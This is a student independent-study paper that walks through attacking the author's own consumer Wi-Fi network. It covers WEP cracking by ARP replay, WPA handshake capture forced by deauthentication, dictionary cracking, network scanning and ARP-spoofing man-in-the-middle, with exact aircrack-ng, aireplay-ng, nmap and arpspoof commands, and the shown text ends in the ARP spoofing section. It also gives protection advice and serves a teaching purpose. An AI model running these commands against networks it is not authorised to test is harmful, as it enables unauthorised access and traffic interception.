ITP 470

WIRELESS SECURITY
Independent Study
Ronnie Flathers
5/8/2011

Flathers - 2

Table of Contents
EXECUTIVE SUMMARY .................................................................................................................................. 4
DISCOVERY OF WIRELESS NETWORKS .......................................................................................................... 5
Active Scans .......................................................................................................................................... 5
Passive Scans ......................................................................................................................................... 5
Scanning Software ................................................................................................................................ 6
Avoiding Detection................................................................................................................................ 9
GAINING ACCESS ......................................................................................................................................... 10
CRACKING WEP ....................................................................................................................................... 11
Cracking Software ............................................................................................................................... 12
Capturing the IVs................................................................................................................................. 12
Packet Injection................................................................................................................................... 13
Cracking the key .................................................................................................................................. 15
Protecting the network ....................................................................................................................... 17
CRACKING WPA ....................................................................................................................................... 17
Capturing the handshake .................................................................................................................... 18
Forcing the handshake ........................................................................................................................ 19
Cracking the passphrase ..................................................................................................................... 20
Protecting the network ....................................................................................................................... 23
INFORMATION GATHERING ........................................................................................................................ 23
Passive scans ....................................................................................................................................... 23
Aggressive scans.................................................................................................................................. 24
Monitoring traffic ................................................................................................................................ 26
MAN IN THE MIDDLE ATTACKS ................................................................................................................... 26
ARP SPOOFING ........................................................................................................................................ 26
Spoofing Software ............................................................................................................................... 27
Advanced Software ............................................................................................................................. 28
ENCRYPTED TRAFFIC ............................................................................................................................... 29
SSL Encryption ..................................................................................................................................... 29
Fake Certificates .................................................................................................................................. 29
SSL Strip............................................................................................................................................... 31
Using SSLStrip...................................................................................................................................... 32

Page 2

Flathers - 3
PROTECTING FROM MITM ATTACKS ...................................................................................................... 34
THE NEXT STEPS .......................................................................................................................................... 35
Metasploit ........................................................................................................................................... 35
Rogue APs ........................................................................................................................................... 36
CONCLUSION............................................................................................................................................... 36
SOURCES ..................................................................................................................................................... 38

Figure 1. Running Kismet ............................................................................................................... 8

Figure 2. Running airodump-ng ...................................................................................................... 9
Figure 3. Capturing Packets .......................................................................................................... 13
Figure 4. Injecting Packets ............................................................................................................ 15
Figure 5. Cracking the WEP Key ................................................................................................. 16
Figure 6. Waiting for WPA Handshake ........................................................................................ 18
Figure 7. Capturing Handshake After a DeAuth .......................................................................... 20
Figure 8. Dictionary Attack on WPA ........................................................................................... 21
Figure 9. Cracking WPA Key ....................................................................................................... 22
Figure 10. Passive Network Map .................................................................................................. 24
Figure 11. Active Network Map ................................................................................................... 25
Figure 12. ARP Spoofing .............................................................................................................. 27
Figure 13. Browser Warning......................................................................................................... 30
Figure 14. SSL Stripping .............................................................................................................. 33
Figure 15. Captured Passwords..................................................................................................... 34

Page 3

Flathers - 4

EXECUTIVE SUMMARY
Over the past several months, I have been researching wireless networks and their security. I
started with a very basic understanding of Linux and wireless networks and a rough idea of what
I wanted to accomplish.
I created a scenario of a malicious hacker being within range of a private wireless network. My
goals were to:

Discover the network and its relevant information

Gain unauthorized access to the network
Passively scan and sniff for valuable information

I envisioned a small business or a household using consumer level wireless products with limited
IT security knowledge. I wanted to see what kind of information an attacker would be able to
glean from the network while trying to remain hidden.
Through the course of my research and practice, I also kept in mind ways to defend against what
I was doing. In that sense, anyone who reads this paper should have a better understanding of
how to properly configure security on their wireless networks.
My Set Up. I modified my familys existing wireless network to suit my needs. We have AT&T
DSL internet which is connected to a Netgear Wireless N Router. This router broadcasts in
wireless N and b/g throughout our entire house. The signal is even capable of being picked up
several hundred feet outside of our house.
The model router is the RangeMax NEXT WNR854T. This is consumer level router designed for
households, but can also commonly be used in small businesses. For example, the Vagabond Inn
on Figueroa uses a similar Netgear Wireless-N router to provide free internet to all of its guests.
The routers IP address is 10.0.0.1 and the subnet is 10.0.0.1-255.
I set up a few victim machines which were connected to the network. These machines served
as the machines I directed my attacks towards. There were 2 virtual machines and one physical
laptop. The virtual machines were connected to the internet through a bridged connection with
the host. The operating system on each was

Windows 7 Ultimate (host)

Windows XP with Service Pack 3 (virtual)
Windows 2000 (virtual)

For the attackers PC, I used another laptop that was running Backtrack 4 R2. Backtrack is a
Debian based Linux distribution that contains numerous security tools for all sorts of penetration
testing and analysis. All of the tools I used were included in Backtrack by default. It was
Page 4

Flathers - 5
installed on an 8GB thumb drive that allowed persistent changes. The laptop was booted from
the thumb drive.
The last piece of hardware needed was an adequate wireless card. After attempting a few
techniques it became obvious that the wireless adapter built into the attack PC could not perform
some attacks. A card that supported packet injection was needed. This is explained later.
After some research on cards that had supported chipsets and worked well with Linux, I
purchased an ALFA AWUSO36H wireless card. This came with a 3 foot USB cord and a 5 dB
antenna. This card used the Realtek chipset, which has great open source support and also allows
for packet injection. The card costs around $30 and was an excellent purchase.
Paper Organization. Below is the culmination of all that I learned about wireless security. It is
broken up into sequential steps, starting with the initial discovery of the wireless networks.
Screenshots and commands used accompany the descriptions.

DISCOVERY OF WIRELESS NETWORKS

The first step of any wireless attack is to identify the network you are attempting to access.
Sometimes, an attacker will know exactly what wireless network he wants to work on, other
times it is necessary to discover a wireless network. There are two different types of wireless
scans: active and passive scanning.
Active Scans. Active scanning occurs when either an Access Point (AP) or a client are actively
trying to discover one another. It can be directed to a specific network or client, or be general.
Wireless APs broadcast a packet called a beacon every tenth of a second. The purpose of these
beacons is specifically for clients to discover the AP. The beacon includes information about the
network, such as the SSID, MAC address of the AP, whether or not encryption is used, etc. A
client can also send out a directed probe looking for an AP, and wait for a response. When a
normal user conducts a scan for wireless networks in range using Windows or Mac, the operating
system is capturing these beacons and displaying the results. This is the most basic way of
discovering wireless networks. An attacker could simply use Windows to discover networks in
range while he slowly moves around a neighborhood. While reading beacons is generally good
enough for the average consumer to connect to their own home network or a public hot spot, they
are only useful if the network is set up to even be discovered. There are more efficient and
stealthier ways of detecting wireless networks.
Passive Scans. As opposed to active discovery, passive discovery involves reading packets and
deriving information from the packets. Passive scanners do not send out any beacons or probes,
but instead gather information from traffic that is already going on wirelessly. Passive scanning

Page 5

Flathers - 6
will yield much greater results than active scanning. To passive scan, a wireless card must be put
into monitor mode.
Monitor mode for a wireless card is similar to promiscuous mode for a NIC. A card in monitor
mode will read every wireless packet it can reach and try to extrapolate data. Because all
wireless networks operate on the same frequency, the air is usually flooded with packets from
several different networks. The card picks up these packets and deduces what network they
belong to. This is different than just only trying beacon or probe packets because there is always
much more traffic than just those two types of packets.
Not all wireless cards support monitor mode. The chipset of the card must support the mode as
well as the driver being used.
There are several programs that utilize these passive scanning techniques. These programs use a
card in monitor mode to constantly read wireless packets. When a new network is discovered
(either through a beacon packet, or reading a normal data packet) the program displays all the
information it can about the network in range. These programs are extremely useful for not only
discovering the location of wireless networks, but also passively collecting important
information about the network. Without even connecting to the network, an attacker can use
these sniffing programs to discover pertinent information about the targets before making an
attack.
Scanning Software. Before scanning software can be used to its full potential, the wireless card
must be put into monitor mode. If monitor mode is available with the chipset and the driver, the
command to put the wireless interface (in this case wlan1) into monitor mode is:
# iwconfig wlan1 mode monitor

Another option is to use a built in program with Backtrack, airmon-ng.

# airmon-ng start wlan1

This will put wlan1 into monitor mode and create a new monitor interface, usually mon0. This
interface will start reading all packets that it picks up. Once the wireless card is in monitor mode,
we are able to begin running a passive scan using the software of our choice.
Although passive scanning applications exist for both Windows and Mac, the best are available
on Linux. The gold standard of scanning software for Linux is a program called Kismet. Kismet
interfaces with all of the wireless cards on a system and logs lots of information in various
formats. It also does a nice job of graphically representing the networks it has discovered.
Backtrack includes the latest version of Kismet by default.
Kismet is used within the console in Backtrack Linux. It runs as a client/server application, so
the first time it is started it will prompt the user to start the Kismet server. The interface is then
Page 6

Flathers - 7
used as the client. Most of the time, the client will be local, but it is possible to run the client
remotely.
Kismet will create several files in the directory that it is run, so it is best practice to create a new
directory each time Kismet is run. Name the directory something useful by including the date or
location that the scan was run. When Kismet is running, it displays information about all the
wireless networks that it finds in range and saves the data to files that can be read later or used by
other programs.
To create a dump directory and run Kismet:
# mkdir kismetscan0224
# cd kismetscan0224
# kismet

Select to start the Kismet server. The Kismet program runs entirely in the console. The ~ is
used to pull up menus, and Tab and Enter are used to move and select. If no interfaces are
automatically added, add the interface that was previously put into monitor mode, in this case,
wlan1 or mon0. After a few seconds, Kismet should begin to populate with wireless networks
that it discovers. It will list the name of the network (if it can determine it), the channel the
network is on, and the number of packets that it has read from that network. The sample output
in my scenario is:

Page 7

Flathers - 8

Target Network

Figure 1. Running Kismet

An attacker now has information about which wireless networks are in range and could be
capable of being attacked. In this example, we have identified our target flathers-n. It has a
strong signal strength and high traffic.
Another option besides Kismet for discovering wireless networks is to use a program included
with the aircrack-ng suite called airodump-ng. This program is used to capture packets and will
be used later on to crack security. However, it can also be used to list wireless networks in range
without capturing and saving any packets. Once again make sure the wireless card is in monitor
mode.
# airodump-ng wlan1

This will start reading packets and listing networks. It shows a little more text information on the
main screen than Kismet, although both are capable of extrapolating the same information. The
bottom portion of the screen also identifies clients that are sending and receiving packets,
important information for later in the attack.

Page 8

Flathers - 9

Target Network

Figure 2. Running airodump-ng

Avoiding Detection. As evidenced by above, if an attacker is in range of a wireless network, it is

not a real challenge to discover it and find out information about it. Several programs make this
almost automatic. Avoiding active scanning is relatively simple, and usually good enough for
most consumers who are not concerned with high security. Since active scanners rely solely on
beacon packets sent from the AP, setting the access point to not include its SSID in its beacons
(beacons cannot be disabled entirely) is the simplest way to avoid detection. All consumer
wireless routers have this ability (it is usually called Dont broadcast). With this enabled, the
average consumer using the default networking programs on Windows or Mac will not discover
the wireless network. All network traffic will include a null value in place of the SSID. Clients
can still connect to the network if they know the actual SSID. Their active scanners can send
probes directed at the SSID which the AP will by default respond too. This can also be
deactivated.
Unfortunately, this is not secure, and any smart attacker will be able to bypass this easily, and
actually use it to his or her advantage. Using passive scanning, an attacker will still be able to tell
that there is a wireless network in range, regardless if it is transmitting its SSID. In addition, for
legitimate clients to connect, they need to send a directed probe with the correct SSID. This is
Page 9

Flathers - 10
easily intercepted and read by a passive scanning program. An attacker can even remotely
disconnect a legitimate user and then sniff the packet he sends to reconnect to get the SSID.
Disabling the broadcasting of the SSID on a router might make it a little more difficult for an
average user to discover or connect, but it really has no effect on a determined attacker.
There are no completely effective ways to avoid detection by a passive scanner. All it takes to be
discovered is to send one packet within range of a listening device. Some recommended ways to
lessen the probability of discovery is to use only Wireless-N, since most attackers will be looking
for B or G networks, or purchase foreign networking equipment that operates on a different
frequency than the standard. A determined attacker with the right equipment, however, will
always eventually be able to discover a wireless network.

GAINING ACCESS
Once a wireless network is discovered, the next step for an attacker is to connect to the network.
Connecting to the network allows the attacker to communicate with the AP and the connected
clients and also to sniff or see what information is being transferred. Although passive scanners
are able to detect packets and ascertain some basic information from intercepted packets, the
actual data in the packets is still encrypted. This is true even for wireless networks that do not
have any encryption methods in place. The data in a packet is designed only to be read by a
client that knows the SSID and has the encryption key (if any). To gain anything really valuable,
an attacker must connect to the network and associate his client with the AP.
The idea behind wireless encryption is that the initial authentication requires a passcode, and
then every single packet being transmitted between the WAP and the client carries a partial
passcode from then on. When the packet reaches its destination, the code is decrypted and
verified, which allows the packet to be read. The purpose of this is to not only bar unauthorized
users from connecting to the WAP, but also to make sure the packets are not read. Packets can be
intercepted as they travel across radio waves by clients that are not connected to the network.
Because of this, every packet needs to be encrypted while it is travelling.
If the network is unprotected, that is to say, has no encryption in place, any client is able to
connect to the network. Most public hot spots will allow any client within range that requests a
connection to connect. By default, this is how most consumer wireless routers are configured.
The priority of most consumer wireless router manufacturers is sadly ease of setup and use - not
security. Because of this, by default all security and encryption methods are turned off. This
enables a consumer to plug in the router to their existing internet connection and have an instant
wireless network. These routers also come with default SSIDs, usually the name of the company,
such as Linksys and NETGEAR. Although they include instructions, and sometimes
warnings, to enable security, many consumers do not follow them. Many, many, networks are
Page 10

Flathers - 11
left completely open and accessible to anyone in range simply because consumers do not know
the risk they are taking.
The two most popular types of encryption for consumer wireless networks are Wireless
Equivalency Protocol (WEP) and WiFi Protected Access (WPA). The latter is much more secure
and recommended; however both are vulnerable to different types of attacks.

CRACKING WEP
With WEP there are two forms of authentication: open system and shared key. In open system
authentication any client can associate with the WAP. The client is authenticated regardless of
the key it possesses and begins to receive packets. The client would need the correct key at this
point to read the packets. In shared key, the client requests authentication and the WAP sends a
challenge text. The client encrypts the challenge text using the WEP key and sends the response
back. If it matches, then the WAP authenticates and associates with the client.
A WEP key is usually 128bit comprised of 26 hexadecimal values, and a 24bit Initialization
Vector (IV). Each packet is encrypted using the RC4 algorithm with the 26 hexadecimal value
and a random IV. The packet is sent, along with the IV in plain text. The client then decrypts the
packet using the hex key and the included IV.
The weakness to WEP lies in the IV. It is sent as plaintext with the packet, which basically
means that anyone who grabs the packet can see the first 24bits of the code that was encrypted.
The RC4 encryption algorithm can only generate about 16million different codes based on the
IV, meaning if you gather enough of these IVs, you can crack the code. Also contributing to
WEPs weakness is the discovery that some of the IVs are weaker than others. Software can
recognize the weak IVs and use them to crack the key even quicker.
After the theory of how to crack WEP was proved possible, computer programs were written that
streamlined the process. There are two steps involved that the programs take. Once an encrypted
wireless network is found and the client is in range, it begins intercepting packets and logging
the IVs. The packets contain encrypted data and are worthless individually, but if enough IVs are
logged the code can be cracked. Usually about 50,000 IVs are needed to crack WEP. The
number of IVs traveling is related to network traffic, so if no ones on the network, it will take
days to get that many. If someone is downloading large files, it could just take hours or minutes.
Once enough IVs have been logged, the next step is to decrypt them and find the key. With
enough IVs, this process only takes seconds.
One method of speeding up the collection of IVs is through a certain type of packet injection.
Not every wireless card can support this, however. They type of packet injection used is called
ARP injection. With this technique, the wireless card sends out an ARP request to the access
Page 11

Flathers - 12
point, which then responds with an ARP response. This response contains an IV, which is then
captured. This process is repeated rapidly to generate numerous IVs. To perform this injection,
the origin of the ARP request must be associated with the AP, or else the AP will not respond.
Software is able to spoof the origin to make the request look like it came from an associated
client, not from the attackers computer.
Cracking Software. The most useful tool for cracking wireless security is a suite of programs
called aircrack-ng. This suite is included in Backtrack and contains all the tools necessary for
discovering and cracking wireless networks. Once a network has been identified through any
technique, the basic steps to crack a WEP encrypted network, and the programs used to
accomplish them are:
1) Begin capturing packets that contain unique IVs and save them to the disk (airodump-ng)
2) Inject ARP requests from an associated client to generate new packets (aireplay-ng)
3) Once enough IVs have been captured, run a cryptographic attack to decipher the WEP
key (aircrack-ng)
Capturing the IVs. In this case, the attacker has already identified the WEP encrypted network he
wants to crack using either Kismet or some other scanning technique. The information he will
need to start collecting IVs is the BSSID of the access point and the channel it is operating on.
When this information is known, the program airodump-ng is used to capture the IVs and save
them to a file. In this case, the BSSID of the network we are trying to crack is
00:1B:2F:D5:2D:E6, the channel is 1, the output file is flathers, and the interface is wlan1:
# airodump-ng -channel 1 bssid 00:1B:2F:D5:2D:E6 --write flathers wlan1

The output will look like this as it is capturing:

Page 12

Flathers - 13

Unique IVs

Figure 3. Capturing Packets

Notice the column #Data. This is the number of unique IVs we have captured. To have a good
chance of cracking the passcode, we will need at least 35,000. The #/s column shows roughly
how many we are capturing each second. In a network with high traffic, this number will be
higher. The stations listed are the associated clients currently sending and receiving packets,
which will be needed to start packet injection.
The program needs to continue to run until it has captured a sufficient amount of IVs. At the rate
shown in the screenshot, this would take an extremely long time. To speed this up, we will use a
packet injection technique.
Packet Injection. While airmon-ng is running in the background, we can launch a new program
to start a packet injection technique called ARP replay. The goal of this is to dramatically
increase the #/s of data captured and decrease the amount of time needed to get all of the
necessary IVs. A program called aireplay-ng is capable of doing several injection attacks and
will be used to start the ARP replay.

Page 13

Flathers - 14
Because an ARP request will only be responded to if the origin is from an associated client, we
need to use the address of one of the clients in our attack. Airmon-ng shows a list of connected
clients and their IDs. In this case, there is one client connected and its address is
00:0F:66:7F:23:D9.
To perform an ARP replay attack, the wireless card must be capable of packet injection and it
must be within range of the AP. If the attacker is too far away, the ARP request packets he sends
will not be responded to. Aireplay-ng contains a simple test to see if injection is capable to the
BSSID of the AP:
# aireplay-ng --test -a 00:1B:2F:D5:2D:E6 wlan1

If the test is successful, then the card is able to inject packets and is within range of the AP. The
next step is to start the ARP replay attack. Aireplay-ng needs both the BSSIDs of the AP and an
associated client, which can be obtained from the client list in airmon-ng:
# aireplay-ng --arpreplay -h 00:0F:66:7F:23:D9 -b 00:1B:2F:D5:2D:E6 wlan1

Once the ARP replay starts working, aireplay-ng will flood the airwaves with ARP requests that
look like they are coming from the associated host. Each of these requests will provoke a
response from the AP which is then captured by airodump-ng running in the background. A
successful attack will look like this:

Page 14

Flathers - 15

ARP Packet Injection

Figure 4. Injecting Packets

The bottom screen shows aireplay-ng running. Airmon-ng is capturing the packets in the
background. Notice the #/s has increased dramatically. It is now only a matter of minutes before
enough IVs are captured.
Once 50,000 IVs are captured, there is a fifty percent chance that the WEP key will be able to be
cracked.
Cracking the key. All of the captured data packets containing IVs are stored in a file outputted by
airmon-ng. The program will write multiple files to the active directory in different formats. The
ones we are interested in are the *.cap files. The program used to read the IVs and crack the key
is called aircrack-ng. This program utilizes two different cryptographic techniques to extract the
key: FMS and PTW. The PTW method is more efficient but only works with captured ARP
responses. It is the default cryptographic attack for aircrack-ng. Because each packet is also
partially encrypted with the SSID, the BSSID of the network is also needed to decrypt the key.
To start the attack:
# aircrack-ng -b 00:1B:2F:D5:2D:E6 flathers*.cap

Page 15

Flathers - 16
With over 70,000 IVs, it took less than 2 seconds to crack the passcode:

Figure 5. Cracking the WEP Key

This is the correct key and can now be used to connect to the network.
The entire process takes only a few minutes and the attacker now has the WEP passcode needed
to connect to the network and decrypt intercepted packets. However, this technique relies on
there being at least one associated client sending and receiving packets that airmon-ng can
capture. Sometimes, there may be no traffic on the network. For example, if an attacker is trying
this technique in the middle of the night when no machines are on, he will not be able to
intercept any packets. This makes it more challenging, but not impossible. The attacker needs to
artificially create traffic.
To accomplish this, the attacker would launch a fake authorization attack on the AP with his own
address. This tricks the AP into thinking that his address is associated with the AP. The next step
is to acquire and isolate an encrypted keystream from a packet sent from the AP. Aireplay-ng has
two methods for doing so, a fragmentation attack and a chop-chop attack. Once the keystream

Page 16

Flathers - 17
is isolated it can be used to encrypt a fake ARP request. Once that fake packet is created, the
same ARP replay technique can be used as above.
This technique basically tricks the AP into sending an encrypted beacon packet to the attacker.
He then is able to extrapolate the encrypted part and use it to encrypt his own ARP packet. This
way, when he sends an ARP request back to the AP, it looks like it came from an associated
client that already has the passcode, since its encrypted properly. Then the same steps are used
to crack the WEP key.
Protecting the network. Breaking WEP encryption is incredibly easy for even an inexperienced
attacker. Although it was the standard for several years, the techniques mentioned above have
proven it to be nearly useless. It is still the default encryption method for many wireless routers,
however. It does an adequate job of keeping out average people who see it has a password and
move on, but it really does nothing against a determined attacker. Really, the only secure advice
is to not use WEP at all. If any business or home is using WEP and is concerned about security
they should upgrade immediately to a more secure form of encryption, like WPA.

CRACKING WPA
After WEP was proven to be completely breakable, WPA became its successor. WPA uses a
much more advanced algorithm and does not have IVs. No amount of packets collected will
allow a computer to crack it. Most consumers use what is called WPA Personal, which utilizes a
pre-shared key (PSK), which is a common key shared across all devices used for authentication.
When a client wants to associate with a WPA encrypted network, a four-way handshake takes
place. Briefly what occurs is the client first seeks association with the AP. The AP sends the
client a bit of data which the client encrypts using the passphrase, SSID, and some other data.
The client sends this back to the AP with another small piece of data which then encrypts that. If
all of these keys match up, the AP installs the main key on the client and the client is
successfully associated and able to decrypt the packets. The packets are encrypted with this key,
not the passcode. This is known as the four-way handshake between a client and the AP.
Unlike WEP, there is not enough information contained in the packets to find the key. No matter
how long an attacker sniffs the network and intercepts packets, he will never be able to crack the
passphrase. However, within the four-way handshake, there is enough information to brute-force
the passphrase.
The basic steps for cracking a WPA Personal encrypted network are:
1) Discover the network and be within range to intercept and inject packets
2) Start sniffing the network for the four way handshake and capture it when it arises
3) Wait for a new client to authenticate -OR- deauthenticate a current client
Page 17

Flathers - 18
4) Brute force the captured handshake file with a dictionary file
Capturing the handshake. The four-way handshake occurs between the AP and a new client
every time a new client attempts to connect to the network. To capture the handshake, airodumpng must be configured to be monitoring the correct channel or SSID and capturing packets.
Assume the attacker has already found a WPA encrypted network named flathers-n at BSSID
00:1B:2F:D5:2D:E6. To start airodump-ng capturing:
# airodump-ng --bssid 00:1B:2F:D5:2D:E6 -w flathers wlan1

This will start airodump-ng capturing every packet coming from that BSSID. Additionally we
could tell airodump-ng to listen to all traffic on a specific channel for a four way handshake,
regardless of the network. If a four-way handshake is discovered, the program will give a
notification and the handshake will be saved in a separate file. Note that this saves all the packets
transmitted, but all that is really needed is the handshake.

Target BSSID

Figure 6. Waiting for WPA Handshake

Page 18

Flathers - 19
Airodump-ng is capturing packets from the flathers-n network and waiting for a four-way
handshake. When a handshake is captured, a notification will appear in the upper right hand
corner.
Forcing the handshake. Since a handshake is conducted every time a client tries to authenticate
with the AP, all that it is needed is for somebody to connect to the network. In large networks
this occurs frequently. The attacker would only need to wait patiently until a new computer is
connected to the network.
Alternatively, if there are already clients connected to the network, an attacker can
deauthenticate them and force them to reconnect. This uses a simple deauth attack which disrupts
the connection between the client and the AP. The client is disconnected momentarily and will
automatically attempt to reconnect. Since it already has the correct credentials, it will be
authenticated by the AP, and a brand new four way handshake is generated. This happens almost
invisibly to the user, who might notice a quick period of disconnection. To perform the deauth
attack, we must know the ID of one of the connected clients, which airmon-ng lists (in this case
00:1C:26:40:B1:8A),. We must also be able to inject packets (see injection test above). The
program used is aireplay-ng:
# aireplay-ng --deauth 25 -a 00:1B:2F:D5:2D:E6 -c 00:1C:26:40:B1:8A wlan1

The number after --deauth is the number of times aireplay-ng will try the attack. A higher
number will increase the probability of it working, but is less stealthy.
If the client was successfully deauthenticated and then reconnected, airmon-ng will update
saying that it has captured a four way handshake:

Page 19

Flathers - 20

Acquired Handshake

DeAuth Attack

Figure 7. Capturing Handshake After a DeAuth

In the above picture, the bottom screen shows the deauthentication attacks being conducted.
Airmon-ng has updated and shows in the upper right hand corner that the handshake has been
captured.
Once the handshake has been captured, the attacker can stop capturing all packets. The
information contained in the handshake is all that is needed to crack to WPA passphrase.
Cracking the passphrase. Once the attacker has the handshake it is possible to crack the
passphrase through brute force or dictionary techniques. This technique uses a word list and goes
through each word one at a time, encrypting it with the other data gathered (the SSID) to see if it
matches. When a match occurs, the word from the list is the passphrase used.
This can be extremely time consuming depending on the complexity of the passphrase and the
size of the dictionary file. An attacker is limited by his processor speed to how many passwords
he can try per second. With dictionary files containing billions and billions of different
combinations of letters and words, the process could take a very long time. Fortunately, most

Page 20

Flathers - 21
consumers choose simple, easy to remember passphrases that can be decrypted using smaller
dictionary files containing common names and passwords.
The program aircrack-ng can be used to crack the handshake. The attacker must have a word list
on his system. Backtrack includes several wordlists of different sizes, and larger ones can be
downloaded from the internet. The largest word list included with Backtrack is:
/pentest/passwords/wordlists/wpa.txt

This is a wordlist designed specifically for cracking WPA passphrases. It is 420 MB and contains
over 35 million different passwords - and this is a relatively small dictionary file!
To use this word list with aircrack-ng and our captured handshake:
# aircrack-ng -w /pentest/passwords/wordlists/wpa.txt flathers*.cap

The output will look like this while aircrack is trying the various passwords:

Current Location in Dictionary

Figure 8. Dictionary Attack on WPA

Page 21

Flathers - 22
This gigantic dictionary file would take several days to be processed by my system. Normally an
attacker would be willing to leave his computer on for a few nights to crack the password. Since
I know that the passphrase for this network is in a smaller dictionary file, however, I used that to
quickly crack the password:

Successful Key

Figure 9. Cracking WPA Key

It only took 20 guesses into the dictionary file to discover a match. The correct passphrase was
deciphered: baseball.
The attacker now has the ability to connect to the network.
Speeding up the cracking process. Bruteforcing and dictionary attacks are processor intensive
and inefficient. For each word in the dictionary file, the computer must encrypt it with the
relevant data and then test to see if it matches. The encryption process for each file is the slowest
one. One way attackers quickly break passwords is through precomputed hash tables, also known
as Rainbow Tables. A rainbow table takes a word list and precomputes all of the encrypted
hashes. Once they are precomputed it is extremely quick for software to locate a match. Rainbow
tables are extremely effective when the encryption method is known and static, such as Windows
Page 22

Flathers - 23
passwords. However, because the WPA key is encrypted with both the passphrase and the SSID,
the tables are only effective if they were precomputed with the correct SSID. There are large
rainbow tables available for free online that were computed with the 1000 most common SSIDs.
This includes all the default SSIDs that most people dont bother to change. The file size is very
large, but if an attacker possesses it and the victims SSID is within the 1000, it will only take him
a matter of minutes, if not seconds, to crack the password.
For example, in the above test, a standard dictionary attack on the passphrase processed about
115 passwords/second. When a rainbow table was computed with the SSID flathers-n and the
crack was run again, the computer processed 44,117 passwords/second!
Protecting the network. WPA is far more secure than WEP and should be standard practice.
However, it is still vulnerable to dictionary attacks. The best way to prevent attacks is to use a
complex passphrase and avoid dictionary words. Also, because the key is also encrypted with the
SSID, using a unique or random SSID will make it harder for an attacker to use a rainbow table.
Noticing unexpected and repetitive deauthentications could also be an indication that an attacker
is attempting to acquire the handshake.
The above technique only works for WPA when it is using a Pre-shared key (PSK). There are
other forms of WPA that are much harder to crack. For example, WPA-AES uses a separate
encryption server to generate the passcodes. This makes it much more difficult (though not
impossible) for an attacker to gain access. However, this type of encryption is expensive and
difficult to set up and maintain and is only really seen at the enterprise level

INFORMATION GATHERING
Once an attacker has access to a wireless network, there are many different attacks and exploits
he can perform. To begin with, however, the attacker must have a clear understanding of the
network layout and what clients could be his potential victims.
There are many different programs that detect live hosts and map a network, and they range from
extremely stealthy to aggressive. Depending on how paranoid the attacker is or how well
monitored the network is, some scans may be better than others.
Passive scans. Network mapping software that is completely passive will only read incoming
packets and attempt to extrapolate any and all information about the network from them. They do
not send out any probes or requests. This takes longer to gather information, and may not give a
complete overview of the network, but the scans are virtually undetectable.
Included with Backtrack is a tool called lanmap. This is a completely passive scanner that just
sits and listens to network traffic. It then generates an image of what it guesses to be the network
Page 23

Flathers - 24
map. This is a useful first step in determining the network layout, especially if the attacker is
being cautious about getting detected. The usage is
# lanmap -i wlan1 -r 10 -T png

Wlan1 is the interface we want to use, the 10 is the refresh rate (in seconds) and png is the output
we want the network map to be. The longer lanmap runs, the more accurate it will be. Since it
only passively sniffs data there must be network activity for it to discover anything. Accordingly,
running this application late at night or when nobody is using the network will yield limited
results. After running this program for only a few minutes, lanmap was able to discover 2 live
hosts other than itself and printed a network map:

Gateway
Active Clients

Figure 10. Passive Network Map

Aggressive scans. While passive scanning may be the stealthiest, it is the slowest and provides
the least amount of information. Several programs make use of active scans to discover hosts and
find out further information about them, such as open ports and running services.
Nmap is one of the most popular host and port scanning applications. It is included in Backtrack,
along with a GUI interface called Zenmap. Nmap has many different scan options ranging from
quick to slow and intensive. This differs from a passive scanner because Nmap will actively send
out request packets trying to contact other hosts. It will also probe ports to see if they are open.
This activity on a network is easy to spot if one is looking for it and larger, managed networks
are set up to notice these scans. However, for most small home or business wireless networks,
they will probably go undetected.
Nmap can perform a port search on a single IP or a range of IPs. When the attacker connects to
the network he will be able to see what subnet the network is operating on. A quick command to
identify the gateway and subnet is:
# netstat -ar

Page 24

Flathers - 25
In the case of the flathers-n network the subnet is 10.0.0.* This means that the IP address of
every connected device has to be within the range 10.0.0.1-255. For large networks, doing a port
scan of every available host is time consuming, so the first step is usually just to determine which
hosts are live by a quick scan
# nmap -T4 -F 10.0.0.1-255

This will yield a quick search of hosts that are live, and any information nmap was able to gather
about them. For this search, 7 live hosts were found and nmap created a rudimentary network
topology:

Our Machine

Gateway

Figure 11. Active Network Map

Page 25

Flathers - 26
Notice that compared to the passive scan, nmap picked up a lot more live hosts. This is because
some of the hosts nmap discovered were not transmitting data when lanmap was run. Nmap
actively probed and searched and found these hosts.
Nmap is capable of much more intensive scans, such as finding open ports and running services.
This is extremely useful in locating potential vulnerabilities on certain clients to exploit.
Monitoring traffic. Another passive way to collect information from a network is by monitoring
traffic. Once the attacker is associated with the network, he can begin intercepting data packets
and reading them. This only works with WEP encrypted networks, however. Because the same
WEP key is shared between all clients, the attacker can decrypt packets sent from any client
using the one key.
If the wireless card is set to monitor mode, the program Wireshark can be used to read all
wireless packets on a certain channel. If you know the WEP key, Wireshark can decrypt the
packets it reads in this mode. This can be useful if the attacker does not want to actually join the
network and just wants to passively look at the traffic. If the attacker joins the network, however,
he can set up additional attacks that are much more effective in intercepting valuable data.

MAN IN THE MIDDLE ATTACKS

Once an attacker is connected to a wireless network, he can begin actively disrupting traffic and
gathering important information. One of the most common and most effective techniques is
known as a man-in-the-middle attack (MiTm). This refers to the fact that the attacker is placing
his or her computer in between where traffic is intended to go, without either party realizing it.
Once his is in the middle of the traffic, he can execute a number of different attacks to gain
valuable information and wreak havoc on the network.

ARP SPOOFING
Address Resolution Protocol (ARP) is used to direct traffic on a network. It resolves IP addresses
with MAC addresses, so clients know where to send their data. For example, when a client wants
to send an HTTP request to the gateway, it uses ARP to see what MAC address is associated
with the gateway IP (in this case, 10.0.0.1).
When an attacker is connected to a wireless network, he can use ARP spoofing to redirect, or
even terminate all network traffic. To become a man in the middle, he redirects all traffic
between two clients or a client and the gateway to go through him. The traffic essentially passes
through his computer transparently to the end user.

Page 26

Flathers - 27
ARP spoofing is the most essential man in the middle attack. Once traffic is redirected through
the attackers computer, he can sniff the traffic for passwords or other information. It also sets
him up for more vicious attacks.
Spoofing Software. Backtrack comes with a program called arpspoof that makes it easy to set up
ARP spoofing and become a man in the middle. The first step is to make sure the default firewall
will allow traffic to pass through computer by turning on IP forwarding. The following command
turns on IP forwarding;
# echo 1 > /proc/sys/net/ipv4/ip_forward

The next step is to put the attacking computer in between the traffic of a client and the gateway.
The gateway in this case is located at 10.0.0.1. We can set up an ARP spoof on the entire
network, which would route all network traffic from any source through our computer. However,
this can really bog the network down. It is more effective to target individual IP addresses. From
one of our earlier scans of the network, we also have the IP address of an active client on the
network (other than our own, obviously): 10.0.0.4. To begin ARP spoofing:
# arpspoof -i wlan0 -t 10.0.0.1 10.0.0.4 && arpspoof -i wlan0 -t 10.0.0.4
10.0.0.1

This executes two commands simultaneously. The first tells the gateway to send all traffic
destined for 10.0.0.4 to the attackers computer instead. The second tells the client to send all
traffic destined for the gateway to us.
The ARP tables on the victims computer will change:

